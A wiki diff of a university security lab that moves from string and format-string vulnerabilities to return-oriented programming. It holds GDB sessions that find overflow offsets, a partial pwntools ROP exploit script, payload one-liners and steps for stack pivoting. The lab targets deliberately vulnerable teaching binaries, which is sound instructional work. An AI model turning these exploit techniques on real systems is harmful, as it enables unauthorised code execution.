Differences

This shows you the differences between two versions of the page.

cns:labs:lab-09 [2017/12/04 17:16]
razvan.deaconescu [[3.5p] Information Leak]
cns:labs:lab-09 [2022/12/05 13:36] (current)
mihai.dumitru2201 [Tasks]
Line 1: Line 1:
-====== Lab 09 - Strings ​======+====== Lab 09 - Return-Oriented Programming (Part 2) ======
  
-===== Resources ​=====+===== Introduction ​=====
  
-  * [[http://www.cert.org/books/secure-coding/|Secure Coding in C and C++]] +In this lab, we pick up where we left off in our [[http://ocw.cs.pub.ro/courses/cns/labs/lab-10|last session]].
-  * [[http://​www.informit.com/articles/article.aspx?​p=2036582|String representation in C]] +
-  * [[https://www.owasp.org/​index.php/​Improper_string_length_checking|Improper string length checking]] +
-  * [[http://​cwe.mitre.org/​data/​definitions/​134.html|Format String definition]],​ [[https://​www.owasp.org/​index.php/​Format_string_attack|Format String Attack ​ (OWASP)]], [[http://​projects.webappsec.org/​w/​page/​13246926/​Format%20String|Format String Attack (webappsec)]] ​  +
-  * [[http://​www.gratisoft.us/​todd/​papers/​strlcpy.html|strlcpy and strlcat - consistent, safe, string copy and concatenation.]] This resource is useful to understand some of the string manipulation problems.+
  
-===== Lab Support Files =====+In many real-life cases you will encounter, a vulnerability will consist of a small buffer overflow, which will not allow you to chain a list of gadgets of arbitrary length. However, there are techniques to circumvent this. Today, we will look at two of these techniques.
  
-We will use this [[http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-09.tar.gz|lab archive]] throughout the lab.+==== Ret-to-vuln ====
  
-Please download the lab archive an then unpack it using the commands below: +If you need to return to several functions but only have room for two or three return addresses, you can return to ''main'' again, or to the function that contains the bug, and trigger the overflow once more.
-<code bash> +
-student@mjolnir:​~$ wget http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-09.tar.gz +
-student@mjolnir:​~$ tar xzf lab-09.tar.gz +
-</​code>​+
  
-After unpacking we will get the ''​lab-09/''​ folder that we will use for the lab: +==== Stack pivoting ====
-<code bash> +
-student@mjolnir:​~$ cd lab-09/ +
-student@mjolnir:​~/​lab-09$ ls +
-basic-format-string ​ basic-info-leak +
-format-string ​ info-leak +
-printf-features ​ string-shellcode +
-</​code>​+
  
-===== Intro =====+A more elegant solution is to "​pivot"​ the stack. Suppose there are additional constraints imposed such that it is impossible to return and repeat the overflow.
  
-This is a tutorial based lab. Throughout this lab you will learn about frequent errors that occur when handling strings. This tutorial is focused on the C language. Generally, OOP languages (like Java, C#, C++) are using classes to represent strings -- this simplifies the way strings are handled and decreases the frequency of programming errors.+Pivoting the stack basically means getting ''RSP'' to point elsewhere in memory, preferably a read-writable location which we control.
  
-===== What is a string? ===== +Supposing we find such a region in memory, we can simply return to a ''call read'' and simulate a call to ''read(0, pivot, size);''. The ''pivot'' address will contain a fabricated stack containing a ropchain of (nearly) arbitrary size.
  
-Conceptually, a string is a sequence of characters. The representation of a string can be done in multiple ways. One of the ways is to represent a string as a contiguous memory buffer. Each character is **encoded** in a way. For example the **ASCII** encoding uses 7-bit integers to encode each character -- because it is more convenient to store 8-bits at a time in a byte, an ASCII character is stored in one byte.+But how do we get ''RSP'' to point to a different region in memory? If you think about the ''leave'' instruction, which roughly does the following, you will begin to see an answer:
  
-The type for representing an ASCII character in C is ''char'' and it uses one byte. As a side note, ''sizeof(char) == 1'' is the only guarantee that the [[http://www.open-std.org/jtc1/sc22/WG14/www/docs/n1256.pdf|C standard]] gives. +<code asm>
- +mov rsp, rbp 
-Another encoding that can be used is Unicode (with UTF8, UTF16, UTF32 etc. as mappings). The idea is that in order to represent an Unicode string, **more than one** byte is needed for **one** character. ''​char16_t'',​ ''​char32_t''​ were introduced in the C standard to represent these strings. The C language also has another type, called ''​wchar_t'',​ which is implementation defined and should not be used to represent Unicode characters. +pop rbp
- +
-Our tutorial will focus on ASCII strings, where each character is represented in one byte. We will show a few examples of what happens when one calls //string manipulation functions// that are assuming a specific encoding of the string. +
- +
-<note> +
-You will find extensive information on ASCII in the [[http://​man7.org/​linux/​man-pages/​man7/​ascii.7.html|ascii man page]]. Inside an Unix terminal issue the command<​code bash> +
-man ascii+
 </​code>​ </​code>​
-</​note>​ 
  
-===== Length management =====+Hence, when we overwrite the stored frame pointer, we can set it to the address we want ''RSP'' to point to.
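
To make the effect of ''leave'' concrete, here is a minimal sketch in plain Python that models ''leave; ret'' on a toy memory. It is only an illustration: the addresses, the ''PIVOT'' name and the stored values are made up, and the model ignores everything except ''rsp'', ''rbp'' and ''rip''.

```python
# Toy model of `leave; ret` on x86-64. Memory is a dict of 8-byte slots.
# All addresses and values below are made up for illustration.

def leave_ret(regs, mem):
    """Apply `leave; ret` to the register dict, reading from `mem`."""
    # leave == mov rsp, rbp ; pop rbp
    regs["rsp"] = regs["rbp"]
    regs["rbp"] = mem[regs["rsp"]]
    regs["rsp"] += 8
    # ret == pop rip
    regs["rip"] = mem[regs["rsp"]]
    regs["rsp"] += 8
    return regs

PIVOT = 0x404800  # hypothetical writable address holding the fake stack

mem = {
    PIVOT - 8: 0xdeadbeef,  # value popped into rbp by `leave`
    PIVOT: 0x401234,        # first "return address" on the fake stack
}

# Assume the overflow replaced the stored frame pointer with PIVOT - 8,
# so the vulnerable function's own epilogue has already loaded it into rbp.
regs = {"rsp": 0x7fffffffe4c8, "rbp": PIVOT - 8, "rip": 0}
leave_ret(regs, mem)
print(hex(regs["rip"]), hex(regs["rsp"]))
```

Note that the stored frame pointer is set to 8 bytes below the fake stack, because ''leave'' pops one value into ''rbp'' before ''ret'' takes the next one as the return address.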
  
-In C, the length of an ASCII string is given by its contents. An ASCII string ends with a ''​0''​ value byte called the ''​NUL''​ byte. Every ''​str*''​ function (i.e. a function with the name starting with ''​str'',​ such as ''​strcpy'',​ ''​strcat'',​ ''​strdup'',​ ''​strstr''​ etc.) uses this ''​0''​ byte to detect where the string ends. As a result, not ending strings in ''​0''​ and using ''​str*''​ functions leads to vulnerabilities.+===== Tasks =====
  
-==== [1p] Basic Info Leak (tutorial) ====+All content necessary for the CNS laboratory tasks can be found in [[cns:resources:repo|the CNS public repository]].
  
-Enter the ''​basic-info-leak/''​ subfolder in the [[http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-09.tar.gz|lab archive]]. It's a basic information leak example. 
  
-In ''​basic_info_leak.c'',​ ''​buf''​ is supplied as input, hence is not trusted. We should be careful with this buffer. If the user gives ''​32''​ bytes as input then ''​strcpy''​ will copy bytes in ''​my_string''​ until it finds a ''​NUL''​ byte (''​0x00''​). Because the [[cns:​labs:​lab-05|stack grows down]], on most platforms, we will start accessing the content of the stack. After the ''​buf''​ variable the stack stores the ''​old ebp'',​ the function return address and then the function parameters. This information is copied into ''​my_string''​. As such, printing information in ''​my_string''​ (after byte index ''​32''​) using ''​puts()''​ results in information leaks. 
  
-We can test this using: +==== 1. Return to main ====
-<​code>​ +
-$ python -c 'print "​A"​*32'​ | ./​basic_info_leak  +
-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX����� +
-</​code>​+
  
-In order to check the hexadecimal values of the leak, we pipe the output through ​''​xxd'':​ +Inspect ​the source file ''​ret_to_main.c''​. ​See if you can spot the vulnerability.
-<​code>​ +
-$ python -c 'print "A"*32' | ./basic_info_leak | xxd +
-00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA +
-00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA +
-00000020: 786d 99ff f184 0408 0a +
-</​code>​+
  
-We have leaked two values above: +The goal of the task is to get the contents of the ''​flag'' ​file through ​the binary. In order to do this, we need to chain three functions together.
-  * the old/stored ''​ebp''​ value (right after the buffer): ​''​0xff996d78'' ​(it's a little endian architecture);​ it will differ on your system +
-  * the ''​my_main()''​ return address: ''​0x080484f1''​+
  
-The return address usually doesn't change (except for executables with PIE, //Position Independent Executable// support). But assuming ASLR is enabled, the ''ebp'' value changes at each run. If we leak it we have a basic address that we can toy around to leak or overwrite other values. We'll see more of that in the [[#p_information_leak|Information Leak]] task. +=== Tutorial: Finding the return address offset ===
-==== [2.5p] Recap: String Shellcode ====+
  
-For starters, let's do a recap on creating a shellcode-based attack and exploiting a string-based vulnerability.+<code asm>
 +# gdb ./​ret_to_main 
 +gdb-peda$ pattc 0x40 
 +'AAA%AAsAABAA$AAnAACAA-AA(AADAA;​AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH'​ 
 +gdb-peda$ r 
 +Starting program: /​cns/​lab-11/​sol/​ret_to_main 
 +Welcome to our Retired Old Programmers message board! 
 +Please leave a message:
 +AAA%AAsAABAA$AAnAACAA-AA(AADAA;​AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH
  
-In the ''​string-shellcode/''​ subfolder in the [[http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-09.tar.gz|lab archive]] you have a vulnerable executable dubbed ​''​string_shellcode''​. The original source code is ''​string_shellcode.c''​. There is an obvious vulnerability when using ''​strcpy()'' ​that will lead to an overflow and a rewrite of the ''​get_num_alpha()''​ function return address when called with a large enough number of characters in ''​g_buffer''​. +Program received signal SIGSEGV, Segmentation fault. 
- +[----------------------------------registers-----------------------------------] 
-Fill the ''TODO'' spots in the ''exploit.py'' script to inject and execute a shell. +RAX: 0x40 ('@')
- +RBX: 0x0
-<note tip> +RCX: 0x7ffff7ee1881 (<__GI___libc_read+17>:     cmp    rax,0xfffffffffffff000)
-ASLR is on. The ''shellcode'' will be stored at the beginning of the ''g_buffer'' global variable which has a constant address. You can determine it using: +RDX: 0x40 ('@')
-<code> +RSI: 0x7fffffffe490 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH\310\345\377\377\377\177")
-nm string_shellcode | grep ' g_buffer' +RDI: 0x0
 +RBP: 0x4147414131414162 ('bAA1AAGA') 
 +RSP: 0x7fffffffe4c8 ("​AcAA2AAH\310\345\377\377\377\177"​) 
 +RIP: 0x4012b4 (<play+55>:       ret) 
 +R8 : 0x19 
 +R9 : 0x7ffff7f315e0 (<​__memcpy_ssse3+6720>: ​    ​mov ​   r10,QWORD PTR [rsi-0x18]) 
 +R10: 0x400443 --> 0x6474730064616572 ('read')
 +R11: 0x246
 +R12: 0x401090 (<_start>: ​       xor    ebp,ebp) 
 +R13: 0x7fffffffe5c0 --> 0x1 
 +R14: 0x0 
 +R15: 0x0 
 +EFLAGS: 0x10203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow) 
 +[-------------------------------------code-------------------------------------] 
 +   ​0x4012a9 <play+44>:  mov    edi,0x0 
 +   0x4012ae <​play+49>: ​ call   ​0x401050 <​read@plt>​ 
 +   ​0x4012b3 <​play+54>: ​ leave 
 +=> 0x4012b4 <​play+55>: ​ ret 
 +   ​0x4012b5 <​main>: ​    ​push ​  rbp 
 +   ​0x4012b6 <​main+1>: ​  ​mov ​   rbp,rsp 
 +   ​0x4012b9 <​main+4>: ​  ​sub ​   rsp,0x10 
 +   ​0x4012bd <​main+8>: ​  ​mov ​   DWORD PTR [rbp-0x4],​edi 
 +[------------------------------------stack-------------------------------------] 
 +0000| 0x7fffffffe4c8 ("AcAA2AAH\310\345\377\377\377\177")
 +0008| 0x7fffffffe4d0 --> 0x7fffffffe5c8 --> 0x7fffffffe7fa ("/​cns/​lab-11/​sol/​task1"​) 
 +0016| 0x7fffffffe4d8 --> 0x100000000 
 +0024| 0x7fffffffe4e0 --> 0x4012e0 (<​__libc_csu_init>: ​  ​push ​  ​r15) 
 +0032| 0x7fffffffe4e8 --> 0x7ffff7e1cbbb (<​__libc_start_main+235>: ​      ​mov ​   edi,eax) 
 +0040| 0x7fffffffe4f0 --> 0x7ffff7fac4d8 --> 0x7ffff7e1c4a0 (<​init_cacheinfo>: ​ push   ​r15) 
 +0048| 0x7fffffffe4f8 --> 0x7fffffffe5c8 --> 0x7fffffffe7fa ("/​cns/​lab-11/​sol/​task1"​) 
 +0056| 0x7fffffffe500 --> 0x1f7f795a8 
 +[------------------------------------------------------------------------------] 
 +Legend: code, data, rodata, value 
 +Stopped reason: SIGSEGV 
 +0x00000000004012b4 in play () 
 +gdb-peda$ 
 +gdb-peda$ patto bAA1AAGA 
 +bAA1AAGA found at offset: 48
 </​code>​ </​code>​
-</​note>​ 
  
-<note tip> +The value that ends up in ''rbp'' sits at offset 48 of our input, so the return address is at offset 56 (48 + 8).
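
The offset arithmetic can be sketched in a few lines of plain Python. This is an illustration only: the ''overflow'' helper and the filler value for the saved ''rbp'' are hypothetical, and ''0x4012b5'' is the address of ''main'' as shown in the GDB output above.

```python
import struct

RBP_OFFSET = 48  # reported by `patto` for the value found in RBP
WORD = 8         # size of a saved register on x86-64

# The saved RBP occupies 8 bytes; the return address comes right after it.
ret_offset = RBP_OFFSET + WORD

def overflow(ret_addr, saved_rbp=0x4242424242424242):
    """Hypothetical helper: padding, then saved RBP, then the return address."""
    return (b"A" * RBP_OFFSET
            + struct.pack("<Q", saved_rbp)
            + struct.pack("<Q", ret_addr))

payload = overflow(0x4012b5)  # 0x4012b5 is <main> in the GDB output
print(ret_offset, len(payload))
```

Keeping the saved ''rbp'' as a separate field, instead of folding it into the padding, makes it easy to control later, when the stored frame pointer itself becomes part of the attack.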
-Use GDB PEDA and ''​pattc'' ​and ''​patto''​ to determine the offset ​between ''​l_buffer''​ and the ''​get_num_alpha()''​ function ​return address.+
  
-In GDB/PEDA in order to send a given string (such as the pattern outputted by ''​pattc''​) ​to the program standard input, use the process substitution construct:​ +=== Tutorial: Opening ​the flag file and returning ​to main ===
-<​code>​ +
-gdb-peda$ r < <(echo '​AAAA.....'​) +
-</​code>​ +
-</​note>​+
  
-<note tip> +Let's think about what a small ropchain needs to look like if we want to:
-Construct the ''payload'' as usual: add the shellcode, add padding and overwrite the ''get_num_alpha()'' function return address with the address of the shellcode (i.e. the address of the ''g_buffer'') global variable. +1. Return to the function which opens the flag file.
-</note> +2. Pass it the correct argument.
-==== [3.5p] Information Leak ==== +3. Return to ''main'' afterwards.
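
The three steps above map onto the stack as sketched below, using only the standard library. Treat it as a layout illustration rather than a working exploit: ''POP_RDI_RET'' and ''ARG'' are placeholder values (finding the real gadget and argument is part of the task), the local ''p64'' is a stand-in for the pwntools helper of the same name, and the other two addresses are the ones the lab's exploit script uses for the flag-opening function and ''main''.

```python
import struct

def p64(value):
    """Stand-in for pwntools' p64: pack a 64-bit little-endian integer."""
    return struct.pack("<Q", value)

RET_OFFSET = 56          # padding up to the return address
POP_RDI_RET = 0x401111   # PLACEHOLDER: address of a `pop rdi; ret` gadget
ARG = 0x1234             # PLACEHOLDER: argument expected by the function
OPEN_FUNC = 0x401172     # function which opens the flag file
MAIN = 0x4012b5          # main, so the overflow can be triggered again

chain = b"".join([
    b"A" * RET_OFFSET,   # filler up to the return address
    p64(POP_RDI_RET),    # step 2: load the first argument ...
    p64(ARG),            # ... this value is popped into rdi
    p64(OPEN_FUNC),      # step 1: return into the target function
    p64(MAIN),           # step 3: its return address is main
])
print(len(chain))
```

The argument comes before the function address because the gadget has to run first: it pops ''ARG'' into ''rdi'' and its ''ret'' then transfers control to the function.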
  
-We will now show how improper string handling will lead to information leaks from the memory. For this, please access the ''​info-leak/''​ subfolder in the [[http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-09.tar.gz|lab archive]]. Please browse the ''​info-leak.c''​ source code file. The executable file is already generated in ''​info-leak''​ (a 32-bit ELF file). 
-  
-The snippet below is the relevant code snippet. The goal is to call the ''​my_evil_func()''​ function. One of the building blocks of exploiting a vulnerability is to see whether or not we have memory write. If you have memory writes, then getting code execution is a matter of getting things right. In this task we are assuming that we have memory write (i.e. we can write any value at any address). You can call the ''​my_evil_func()''​ function by overriding the return address of the ''​my_main()''​ function: 
  
-<code C> +We'll need to save a few useful addresses:
-#define NAME_SZ 32 +
- +
-static void read_name(char *name) +
-+
- memset(name,​ 0, NAME_SZ); +
- read(0, name, NAME_SZ); +
- //​name[NAME_SZ-1] = 0; +
-+
- +
-static void my_main(void) +
-+
- char name[NAME_SZ];​ +
- +
- read_name(name);​ +
- printf("​hello %s, what address to modify and with what value?​\n",​ name); +
- fflush(stdout);​ +
- my_memory_write();​ +
- printf("​Returning from main!\n"​);​ +
-+
-</​code>​ +
- +
-What catches our eye is that the ''​read()''​ function call in the ''​read_name()''​ function read **exactly** ''​32''​ bytes. If we provide it ''​32''​ bytes it won't be null-terminated and will result in an information leak when ''​printf()''​ is called in the ''​my_main()''​ function. +
- +
-=== Exploiting the memory write using the info leak === +
- +
-Let's first try to see how the program works:+
 <code bash> <code bash>
-$ python -c 'import sys; sys.stdout.write(10*"A")' | ./info_leak +# nm ret_to_main | egrep "main|stop|right|there|play"
-hello AAAAAAAAAA, what address to modify and with what value? +                 
-</​code>​+00000000004012b5 T main 
 +000000000040127d T play 
 +00000000004011da T right 
 +0000000000401172 T stop 
 +000000000040124b T there
  
-The binary wants an input from the user using the ''​read()''​ library call as we can see below: 
-<code bash> 
-$ python -c '​import sys; sys.stdout.write(10*"​A"​)'​ | strace -e read ./info_leak 
-strace: [ Process PID=7736 runs in 32 bit mode. ] 
-read(3, "​\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\203\1\0004\0\0\0"​...,​ 512) = 512 
-read(0, "​AAAAAAAAAA",​ 32)               = 10 
-hello AAAAAAAAAA, what address to modify and with what value? 
-read(0, "",​ 4)                          = 0 
-+++ exited with 255 +++ 
 </​code>​ </​code>​
  
-The input is read using the ''​read()''​ system call. The first read expects 32 bytes. You can see already that there'​s ​another ''​read()''​ call. That one is the first ''​read()''​ call in the ''​my_memory_write()''​ function.+Let'​s ​start writing our exploit script.
  
-As noted above, if we use exactly ''32'' bytes for name we will end up with a non-null-terminated string, leading to an information leak. Let's see how that goes: +<code python>
-<code bash> +#!/usr/bin/env python
-python ​-c 'import ​sys; sys.stdout.write(32*"​A"​)'​ | ./​info_leak +from pwn import *
-hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�)���,​ what address to modify and with what value?+
  
-$ python -c 'import sys; sys.stdout.write(32*"A")' | ./info_leak | xxd +io = process('./ret_to_main')
-00000000: 6865 6c6c 6f20 4141 4141 4141 4141 4141  hello AAAAAAAAAA +
-00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA +
-00000020: 4141 4141 4141 58da e0ff 0586 0408 2c20  AAAAAAX.......,​  +
-00000030: 7768 6174 2061 6464 7265 7373 2074 6f20  what address to  +
-00000040: 6d6f 6469 6679 2061 6e64 2077 6974 6820  modify and with  +
-00000050: 7768 6174 2076 616c 7565 3f0a            what value?. +
-</​code>​+
  
-We see we have an information leak. We leak two pieces of data above: ''​0xff30da58''​ (little endian representation) and ''​0x08048605''​. The first one seems to be a stack address and the second one a code/text address.+# Useful values 
 +ret_offset = 56 
 +main_addr = 0x4012b5 
 +play_addr = 0x40127d 
 +open_flag = 0x401172
  
-If we run multiple times we can see that the values for the first piece of information differs: +# Construct payloads 
-<code bash> +payload_to_ret = b'A' * ret_offset  # bytes, so it can be concatenated with p64() output
-$ python -c 'import sys; sys.stdout.write(32*"​A")' ​| ./info_leak | xxd | grep ','​ +
-00000020: 4141 4141 4141 18e8 9fff 0586 0408 2c20  AAAAAA........, ​+
  
-$ python -c '​import sys; sys.stdout.write(32*"​A"​)' | ./info_leak | xxd | grep ','​ +payload1 = payload_to_ret 
-00000020: 4141 4141 4141 4879 ccff 0586 0408 2c20  AAAAAAHy......, ​+payload1 += TODO (pop rdi gadget)  
 +payload1 += p64(open_key)  # TODO: define open_key, the argument popped into rdi
 +payload1 += p64(open_flag) 
 +payload1 += p64(main_addr)
  
-$ python -c '​import sys; sys.stdout.write(32*"​A"​)'​ | ./info_leak | xxd | grep ','​ 
-00000020: 4141 4141 4141 9867 9bff 0586 0408 2c20  AAAAAA.g......,​ 
-</​code>​ 
  
-The variable part is related to a stack address (it starts with ''​0xff''​);​ it varies because ASLR is enabled. We want to look more carefully using GDB and figure out what the variable value represents: 
-<code bash> 
-$ gdb -q ./info_leak 
-Reading symbols from ./​info_leak...done. 
-gdb-peda$ b printf 
-Breakpoint 1 at 0x80483c0 
-gdb-peda$ r < <(python -c '​import sys; sys.stdout.write(32*"​A"​)'​) 
-Starting program: /​home/​razvan/​school/​2012-2013/​oss/​repo.git/​labs/​lab-09/​info-leak/​info_leak < <(python -c '​import sys; sys.stdout.write(32*"​A"​)'​) 
-[...] 
  
-Breakpoint 1, 0xf7e2a8f0 in printf () from /​lib/​i386-linux-gnu/​libc.so.6 +io.recvline() 
-gdb-peda$ bt +io.recvline() 
-#0  0xf7e2a8f0 in printf ​() from /​lib/​i386-linux-gnu/​libc.so.6 +io.sendline(payload1)
-#1  0x080485d7 in my_main () at info_leak.c:43 +
-#2  0x08048605 in main () at info_leak.c:​51 +
-#3  0xf7df9276 in __libc_start_main () from /​lib/​i386-linux-gnu/​libc.so.6 +
-#4  0x08048451 in _start ​() +
-gdb-peda$ up +
-#1  0x080485d7 in my_main () at info_leak.c:​43 +
-43 printf("​hello %s, what address to modify and with what value?​\n",​ name); +
-gdb-peda$ x/12wx name +
-0xffffd270:​ 0x41414141 0x41414141 0x41414141 0x41414141 +
-0xffffd280:​ 0x41414141 0x41414141 0x41414141 0x41414141 +
-0xffffd290:​ 0xffffd298 0x08048605 0x00000000 0xf7df9276 +
-gdb-peda$ x/2i 0x08048605 +
-   ​0x8048605 <​main+8>:​ push ​  ​0x8048710 +
-   ​0x804860a <​main+13>:​ call ​  ​0x80483e0 <​puts@plt>​ +
-gdb-peda$ pdis main +
-Dump of assembler code for function main: +
-   ​0x080485fd <​+0>:​ push ​  ebp +
-   ​0x080485fe <​+1>:​ mov ​   ebp,esp +
-   ​0x08048600 <​+3>:​ call ​  ​0x80485b7 <​my_main>​ +
-   ​0x08048605 <​+8>:​ push ​  ​0x8048710 +
-   ​0x0804860a <​+13>:​ call ​  ​0x80483e0 <​puts@plt>​ +
-   ​0x0804860f <​+18>:​ add ​   esp,0x4 +
-   ​0x08048612 <​+21>:​ mov ​   eax,0x0 +
-   ​0x08048617 <​+26>:​ leave ​  +
-   ​0x08048618 <​+27>:​ ret ​    +
-End of assembler dump. +
-gdb-peda$ ​  +
-</​code>​+
  
-From the GDB above, we determine that, after our buffer, there are two values: one value is the stored ''​ebp''​ (i.e. old ebp) and one value is the return address of the ''​my_main()''​ function (that gets it back to ''​main()''​). +io.interactive()
- +
-When we leak the two values we are able to retrieve the stored ''​ebp''​ value. In the above run the value of ''​ebp''​ is ''​0xffffd298''​. We also see that the stored ''​ebp''​ value is stored at **address** ''​0xffffd290'',​ which is the address current ''​ebp''​. We have the situation in the below diagram: +
- +
-{{ :​cns:​labs:​info-leak-stack.png?​600 |}} +
- +
-We marked the stored ''​ebp''​ value (i.e. the frame pointer for ''​main()'':​ ''​0xffffd298''​) with the font color red in both places. +
- +
-In short, if we leak the value of the stored ''​ebp''​ (i.e. the frame pointer for ''​main()'':​ ''​0xffffd298''​) we can determine the address where the current ''​ebp''​ (i.e. the frame pointer for ''​my_main()'':​ ''​0xffffd290''​) by subtracting ''​8''​. The address where the ''​my_main()''​ return address is stored (''​0xffffd294''​) is computed by subtracting ''​4''​ from the leaked ''​ebp''​ value. By overwriting the value at this address we will force an arbitrary code execution and call ''​my_evil_func()''​. +
- +
-In order to write the the return address of the ''​my_main()''​ function with the address of the ''​my_evil_func()''​ function, make use of the conveniently (but not realistically) placed ''​my_memory_write()''​ function. +
- +
-Considering all of this, update the ''​TODO''​ lines of the ''​exploit.py''​ script to make it call the ''​my_evil_func()''​ function. +
- +
-<note tip> +
-Same as above, use ''​nm''​ to determine address of the ''​my_evil_func()''​ function. +
-</​note>​ +
- +
-<note tip> +
-Use the above logic to determine the ''​old ebp''​ leak and then the address of the ''​my_main()''​ return address. +
-</​note>​ +
- +
-<note tip> +
-See [[https://​docs.pwntools.com/​en/​stable/​util/​packing.html#​pwnlib.util.packing.unpack|here]] examples of using the ''​unpack()''​ function. +
-</​note>​ +
- +
-<note tip> +
-In case of a successful exploit the program will return with the ''​42''​ error code in the ''​my_evil_func()''​ function, same as below: +
-<​code>​ +
-$ python exploit.py  +
-[+] Starting local process '​../​info_leak':​ Done +
-[*] old_ebp is 0xffd66228 +
-[*] return address is located at is 0xffd66224 +
-[*] Process '​../​info_leak'​ stopped with exit code 42+
 </​code>​ </​code>​
-</​note>​ 
- 
-<note important>​ 
-The rule of thumb is: **Always know your string length.** 
-</​note>​ 
- 
-===== Format String Attacks ===== 
- 
-We will now see how (im)proper use of ''​printf''​ may provide us with ways of extracting information or doing actual attacks. 
  
-Calling ​''​printf''​ or some other string function that takes a format string as a parameter, directly with a string which is supplied by the user leads to a vulnerability called **format string attack**.+Let's test this code to see if it works:
  
-The definition of ''​printf'':​ 
 <code bash> <code bash>
-int printf(const char *format, ​...);+./test.py  
 +[+] Starting local process '​./​ret_to_main':​ Done 
 +[*] Switching to interactive mode 
 +-> secret vault opened 
 +Welcome to our Retired Old Programmers message board! 
 +Please leave a message:  
 +$  
 +[*] Stopped program './​ret_to_main'​
 </​code>​ </​code>​
  
-Let's recap some of [[http://​www.cplusplus.com/​reference/​cstdio/​printf/​|useful formats]]:+=== Reading and printing the flag  ===
  
-  * %08x -- prints a number in hex format, meaning takes a number from the stack and prints in hex format +Build two more similar payloads to send: one that returns to the function which reads the contents of the flag, and another that returns to the function which prints it. Remember to return to ''main'' after each one so that the payloads can be chained.
-  * %s -- prints a string, meaning takes a pointer from the stack and prints the string from that address +
-  * %n -- writes the number of bytes written so far to the address given as a parameter ​to the function (takes a pointer from the stack). This format is not widely used but it is in the C standard.+
  
-''%x'' and ''%n'' are enough to have memory read and write and hence, to successfully exploit a vulnerable program that calls printf (or other format string function) directly with a string controlled by the user.+==== 2. Stack pivoting ====
  
-==== Example 2 ====+For this task, we will be using the same binary. This time, we will pivot the stack before supplying our ROP chain.
  
-<code C> +=== Tutorial: Finding a place to pivot  ===
-printf(my_string);​ +
-</​code>​+
  
-The above snippet is a good example ​of why ignoring compile time warnings is dangerous. The given example is easily detected by static checker.+We can use ''​gdb-peda''​ to see the memory mappings ​of a binary at runtime.
  
-Try to think about: +<code asm> 
- +gdb-peda$ start 
-  * The peculiarities of ''​printf''​ (variable number of arguments) +gdb-peda$ vmmap 
-  * Where ''​printf''​ stores its arguments (//hint//: on the stack) +Start              End                Perm Name 
-  * What happens when ''​my_string''​ is ''​%%"​%x"​%%''​ +0x00400000 ​        ​0x00403000 ​        ​r-xp task1 
-  * How matching between format strings (e.g. the one above) and arguments is enforced (//hint//: it's not) and what happens in general when the number of arguments doesn't match the number of format specifiers +0x00403000         0x00404000         r-xp task1
-  * How we could use this to cause information leaks and arbitrary memory writes (//hint//: see the format specifiers at the beginning of the section) +0x00404000 ​        ​0x00405000 ​        ​rw-p task1 
- +0x00007ffff79e4000 0x00007ffff7bcb000 r-xp /lib/x86_64-linux-gnu/libc-2.27.so 
-==== [1p] Example 3 ==== +0x00007ffff7bcb000 0x00007ffff7dcb000 ---p /lib/x86_64-linux-gnu/libc-2.27.so
- +0x00007ffff7dcb000 0x00007ffff7dcf000 r-xp /lib/​x86_64-linux-gnu/​libc-2.27.so 
-We would like to check some of the well known and not so-well known features of [[http://man7.org/linux/man-pages/​man3/​printf.3.html|the printf function]]. Some of them may be used for information leaking and for attacks such as format string attacks+0x00007ffff7dcf000 0x00007ffff7dd1000 rwxp /lib/x86_64-linux-gnu/libc-2.27.so 
- +0x00007ffff7dd1000 0x00007ffff7dd5000 rwxp mapped 
-Go into ''printf-features/'' subfolder and browse the ''printf-features.c'' file. Compile the executable file using:<code bash> +0x00007ffff7dd5000 0x00007ffff7dfc000 r-xp /lib/x86_64-linux-gnu/ld-2.27.so
-make +0x00007ffff7fd3000 0x00007ffff7fd5000 rwxp mapped 
-</code> +0x00007ffff7ff7000 0x00007ffff7ffa000 r--p [vvar]
-and then run the resulting executable file using<​code bash> +0x00007ffff7ffa000 0x00007ffff7ffc000 r-xp [vdso] 
-./printf-features+0x00007ffff7ffc000 0x00007ffff7ffd000 r-xp /lib/x86_64-linux-gnu/ld-2.27.so 
 +0x00007ffff7ffd000 0x00007ffff7ffe000 rwxp /​lib/​x86_64-linux-gnu/ld-2.27.so 
 +0x00007ffff7ffe000 0x00007ffff7fff000 rwxp mapped 
 +0x00007ffffffde000 0x00007ffffffff000 rwxp [stack] 
 +0xffffffffff600000 0xffffffffff601000 r-xp [vsyscall]
 </​code>​ </​code>​
  
-Go through the ''printf-features.c'' file again and check how print, length and conversion specifiers are used by ''printf''. We will make use of the ''%n'' feature that allows memory writes, a requirement for attacks. +The region beginning at ''0x00404000'' looks suitable, but to be safe, let's not use its starting address.
- +
-==== [2p] Basic Format String Attack ==== +
- +
-You will now do a basic format string attack using the ''​basic-format-string/''​ subfolder in the [[http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-09.tar.gz|lab archive]]. The source code is in ''​basic_format_string.c''​ and the executable is in ''​basic_format_string''​. +
- +
-You need to use ''​%n''​ to overwrite the value of the ''​v''​ variable to ''​100''​. You have to do three steps: +
-  - Determine the address of the ''​v''​ variable using ''​nm''​. +
-  - Determine the ''​n''​-th parameter of ''​printf()''​ that you can write to using ''​%n''​. The ''​buffer''​ variable will have to be that parameter; you will store the address of the ''​v''​ variable in the ''​buffer''​ variable. +
-  - Construct a format string that enables the attack; the number of characters processed by ''​printf()''​ until ''​%n''​ is matched will have to be ''​100''​. +
- +
-For the second step let'​s ​run the program multiple times and figure out where the ''​buffer'' ​address ​starts. We fill ''​buffer''​ with the ''​aaaa''​ string and we expect to discover it using the ''​printf()''​ format specifiers.+
  
 <​code>​ <​code>​
